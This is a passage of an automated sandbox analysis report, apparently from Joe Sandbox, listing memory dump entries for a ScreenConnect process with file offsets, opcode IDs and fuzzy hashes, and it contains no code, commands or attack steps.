                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 097ef62481bc9016ab566f04c1dd258e668e11d0634a71c835e287d7a7cf894d
                                                                                    • Instruction ID: b722c061d3d6a34eeb5955aba33e0323f7b67ea1255072d0a43161f10419cd20
                                                                                    • Opcode Fuzzy Hash: 097ef62481bc9016ab566f04c1dd258e668e11d0634a71c835e287d7a7cf894d
                                                                                    • Instruction Fuzzy Hash: 9A817861B2EF8E1FEBA99B6844B55B07BE1FF55300B1501BAD058C71E7ED18B9068341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 042d472427b0bd2f8ce4bc771e41e7638a4aeda33671038907ffb98c3aa127e5
                                                                                    • Instruction ID: 21954ae0f0292d1a625ccff30e17f4d667f2e36def86adec00e9c157a63cf86a
                                                                                    • Opcode Fuzzy Hash: 042d472427b0bd2f8ce4bc771e41e7638a4aeda33671038907ffb98c3aa127e5
                                                                                    • Instruction Fuzzy Hash: 37812C32B1DE0E6BDB68EA54C4628B533D1FF68340B504539D84E8B5E6EE25FA0687C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b235e14b623313a8efed2f4097ba078ead85e7bae3203b35f126b58b43032e8
                                                                                    • Instruction ID: 58259e8018a3c39899a86a9cab6c74f852ae00aaa008aa244ea937a21e320354
                                                                                    • Opcode Fuzzy Hash: 5b235e14b623313a8efed2f4097ba078ead85e7bae3203b35f126b58b43032e8
                                                                                    • Instruction Fuzzy Hash: 2481677072DA4E9FEBB9EBA8C4617A937D1FF59700F1240B8D44ECB1A2DD69E9018740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 615ee5dbaed1d4639f4ed72b1abcb8aefdd23c512511d3ca8913baa72b302123
                                                                                    • Instruction ID: 19cbb9301803f3000e0b7a48f7befaa03e8732541710b5dfcb3f82d38b5cab76
                                                                                    • Opcode Fuzzy Hash: 615ee5dbaed1d4639f4ed72b1abcb8aefdd23c512511d3ca8913baa72b302123
                                                                                    • Instruction Fuzzy Hash: B8710B63E1F7D95FE76697AC58755E93BA0AF22610B0E00FBC0C88B0E3ED15A9458345
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 43d1ca4e4bdfed28c394f4cb18c51e70a9cad83cb13c09770b2038adfbeb708c
                                                                                    • Instruction ID: db3e02dbcb0e57c27ef6bf6f1ef9714059ca9c8a5d0b49b3cd12dc0970ac17fa
                                                                                    • Opcode Fuzzy Hash: 43d1ca4e4bdfed28c394f4cb18c51e70a9cad83cb13c09770b2038adfbeb708c
                                                                                    • Instruction Fuzzy Hash: F2610721B2EB4B5FFB7D9BA884B16B43791EF56304F1601B9D45DCA1E7CD1CB8068241
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d3c16448efdef90d35d4d9a9ac3b53bbb4a7514dc04fd683b5849e12f230fc63
                                                                                    • Instruction ID: 5fc7dd4f8899db85940c3a7deb7a017f78d1920f7bd08b6af41b9555f131b0e4
                                                                                    • Opcode Fuzzy Hash: d3c16448efdef90d35d4d9a9ac3b53bbb4a7514dc04fd683b5849e12f230fc63
                                                                                    • Instruction Fuzzy Hash: AE51D47271EA494FEB98DF58C461AA533D2FFA4350B0501B9D45DCB2A6DE31F806CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b839dc61486c0d0351d871e14a85de1cea7a1d26b83d5be943f5e7ba13cfc441
                                                                                    • Instruction ID: 58205cb2aae95125d14c2653897c8abecb575c489a02d6fc8947aaadc12dd448
                                                                                    • Opcode Fuzzy Hash: b839dc61486c0d0351d871e14a85de1cea7a1d26b83d5be943f5e7ba13cfc441
                                                                                    • Instruction Fuzzy Hash: F6514C32B1FE4D9BEB659A9898B40E877E1FF98344F0501BAD45DC31B2EF256946C340
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3966772fc353c884eebc703097987387e6e7846589e445899af7739ae550674b
                                                                                    • Instruction ID: 344faec43dcd15c5d2be91a190ce218085fca8ad4a8cc1c31e1194d7b805018b
                                                                                    • Opcode Fuzzy Hash: 3966772fc353c884eebc703097987387e6e7846589e445899af7739ae550674b
                                                                                    • Instruction Fuzzy Hash: 1A414534719A0A8FDEDCEF58C09176573A2FF98304B654968C069DB69AC635E943C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df380a329617b6b99966437fbf9184defaa94d40c9aa47a4bd152fea513f8493
                                                                                    • Instruction ID: ff26813d6ff61025a259d275a5dce6410f0648648e6ce3b27969b6a9daba7a3e
                                                                                    • Opcode Fuzzy Hash: df380a329617b6b99966437fbf9184defaa94d40c9aa47a4bd152fea513f8493
                                                                                    • Instruction Fuzzy Hash: 4931273290F3A62BD755A778A8714D537A0DF0262870906B7D0DE8E0B7EE15158B8784
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a36153cb0f1baa1fba9485714e7bb8c6853a012ef011f19cc53bdb9be8606de6
                                                                                    • Instruction ID: 39c46fe4615ecd981d836d17466cca1c71a144be72438367187baf97cdb1b81c
                                                                                    • Opcode Fuzzy Hash: a36153cb0f1baa1fba9485714e7bb8c6853a012ef011f19cc53bdb9be8606de6
                                                                                    • Instruction Fuzzy Hash: 70212B3290F3AA6FD755A77CA4754D537A0EF0262870906B7C0DE8F0B7EE1515478740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 44eb3171c9ab6aa8816482611ccfac05d07789e543dfd6b995d82a8c6981f087
                                                                                    • Instruction ID: 87f80b27f16accb7f8212954d489ff6d21739744159f19dbacfbcd1c6df15d11
                                                                                    • Opcode Fuzzy Hash: 44eb3171c9ab6aa8816482611ccfac05d07789e543dfd6b995d82a8c6981f087
                                                                                    • Instruction Fuzzy Hash: 8B31B031F6BA0FAAFBB997E44070AB963D2AF44344F554438D45DC61E2EE2CBA028641
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd